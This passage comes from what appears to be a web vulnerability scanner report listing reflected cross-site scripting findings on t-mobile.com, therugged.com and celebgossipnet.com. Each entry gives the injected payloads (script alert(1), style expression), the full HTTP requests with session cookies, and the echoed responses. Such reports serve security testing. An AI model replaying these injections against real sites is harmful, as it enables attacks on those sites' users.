Content-Length: 40727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Business/Information.aspx?tp=international_calling&60c04"style="x:expression(alert(1))"72ceeb5d2f5=1">
...[SNIP]...

1.241. http://www.t-mobile.com/promotions/generic.aspx [PAsset parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/promotions/generic.aspx

Issue detail

The value of the PAsset request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff00"style%3d"x%3aexpression(alert(1))"d1cacbdcc0d was submitted in the PAsset parameter. This input was echoed as 4ff00"style="x:expression(alert(1))"d1cacbdcc0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /promotions/generic.aspx?PAsset=Pro_Pro_MastHeadCoverage4ff00"style%3d"x%3aexpression(alert(1))"d1cacbdcc0d HTTP/1.1
Host: www.t-mobile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; cmTPSet=Y; mbox=PC#1300624507874-511379.17#1301836695|check#true#1300627155|session#1300627094627-816279#1300628955; mr_referredVisitor=0; TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300616298452:ss=1300616298452; TMobileSession=WT=&DCS=

Response

1.242. http://www.therugged.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5416e"><script>alert(1)</script>426ea6897eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5416e\"><script>alert(1)</script>426ea6897eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5416e"><script>alert(1)</script>426ea6897eb=1 HTTP/1.1
Host: www.therugged.com
Proxy-Connection: keep-alive
Referer: http://www.therugged.com/featured/friday-link-drop-9/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1818978010-1300624508291; _jsuid=8651665616604869668; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; __utmc=14936179; __utmb=14936179.2.10.1300626402; fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:23:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=223fbid6ehr471qtv6imok7gv1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 89645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/?5416e\"><script>alert(1)</script>426ea6897eb=1">
...[SNIP]...

1.243. http://www.therugged.com/page/10/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7a63"><script>alert(1)</script>3675e63a9f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7a63\"><script>alert(1)</script>3675e63a9f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/10/?d7a63"><script>alert(1)</script>3675e63a9f9=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/9/?d7a63\"><script>alert(1)</script>3675e63a9f9=1">
...[SNIP]...

1.244. http://www.therugged.com/page/2/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/2/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9211d"><script>alert(1)</script>7c95d060380 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9211d\"><script>alert(1)</script>7c95d060380 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/2/?9211d"><script>alert(1)</script>7c95d060380=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 86768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/?9211d\"><script>alert(1)</script>7c95d060380=1">
...[SNIP]...

1.245. http://www.therugged.com/page/3/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/3/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72263"><script>alert(1)</script>093ffca9d9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72263\"><script>alert(1)</script>093ffca9d9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/3/?72263"><script>alert(1)</script>093ffca9d9d=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:59:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/2/?72263\"><script>alert(1)</script>093ffca9d9d=1">
...[SNIP]...

1.246. http://www.therugged.com/page/4/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/4/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adfde"><script>alert(1)</script>50bb764cb5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as adfde\"><script>alert(1)</script>50bb764cb5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/4/?adfde"><script>alert(1)</script>50bb764cb5b=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 86161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/3/?adfde\"><script>alert(1)</script>50bb764cb5b=1">
...[SNIP]...

1.247. http://www.therugged.com/page/5/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/5/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f0b7"><script>alert(1)</script>05c9f1e840f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4f0b7\"><script>alert(1)</script>05c9f1e840f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/5/?4f0b7"><script>alert(1)</script>05c9f1e840f=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:59:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/4/?4f0b7\"><script>alert(1)</script>05c9f1e840f=1">
...[SNIP]...

1.248. http://www.therugged.com/page/6/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/6/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d775d"><script>alert(1)</script>f3bf3d64a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d775d\"><script>alert(1)</script>f3bf3d64a04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/6/?d775d"><script>alert(1)</script>f3bf3d64a04=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 86539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/5/?d775d\"><script>alert(1)</script>f3bf3d64a04=1">
...[SNIP]...

1.249. http://www.therugged.com/page/7/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/7/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f85ee"><script>alert(1)</script>815d5bae0fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f85ee\"><script>alert(1)</script>815d5bae0fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/7/?f85ee"><script>alert(1)</script>815d5bae0fc=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 86799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/6/?f85ee\"><script>alert(1)</script>815d5bae0fc=1">
...[SNIP]...

1.250. http://www.therugged.com/page/8/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/8/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0da"><script>alert(1)</script>5d433ed65ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd0da\"><script>alert(1)</script>5d433ed65ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/8/?cd0da"><script>alert(1)</script>5d433ed65ff=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/7/?cd0da\"><script>alert(1)</script>5d433ed65ff=1">
...[SNIP]...

1.251. http://www.therugged.com/page/9/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/9/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f557a"><script>alert(1)</script>f69f3251ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f557a\"><script>alert(1)</script>f69f3251ab7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/9/?f557a"><script>alert(1)</script>f69f3251ab7=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 88432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/8/?f557a\"><script>alert(1)</script>f69f3251ab7=1">
...[SNIP]...

1.252. http://www.therugged.com/page/97/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.therugged.com
Path:	/page/97/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8fa0"><script>alert(1)</script>241fccb7ab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8fa0\"><script>alert(1)</script>241fccb7ab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page/97/?a8fa0"><script>alert(1)</script>241fccb7ab8=1 HTTP/1.1
Host: www.therugged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_b307530015170f0db3bdfd78aaa30915=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=14936179.1300626402.2.2.utmcsr=therugged.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=qu4riiab0adpdtk3u18avdops0; __utma=14936179.1046767921.1300624509.1300624509.1300626402.2; _jsuid=8651665616604869668; __utmc=14936179; __utmb=14936179.8.10.1300626402; __qca=P0-1818978010-1300624508291;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:00:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.therugged.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 72623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.fa
...[SNIP]...
<a href="http://www.therugged.com/page/96/?a8fa0\"><script>alert(1)</script>241fccb7ab8=1">
...[SNIP]...

1.253. http://www.celebgossipnet.com/contact/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.celebgossipnet.com
Path:	/contact/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385fb"><script>alert(1)</script>d34ce8e0a58 was submitted in the Referer HTTP header. This input was echoed as 385fb\"><script>alert(1)</script>d34ce8e0a58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: www.celebgossipnet.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=385fb"><script>alert(1)</script>d34ce8e0a58
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=fl9c607dfnliv4ei1p9o1h4oe2; __qca=P0-485061537-1300626391651; __utmz=205167490.1300626399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205167490.381782026.1300626399.1300626399.1300626399.1; __utmc=205167490; __utmb=205167490.1.10.1300626399; _jsuid=7083869468851009847

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.celebgossipnet.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 95676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="wpcf_referer" value="http://www.google.com/search?hl=en&q=385fb\"><script>alert(1)</script>d34ce8e0a58″ />
...[SNIP]...

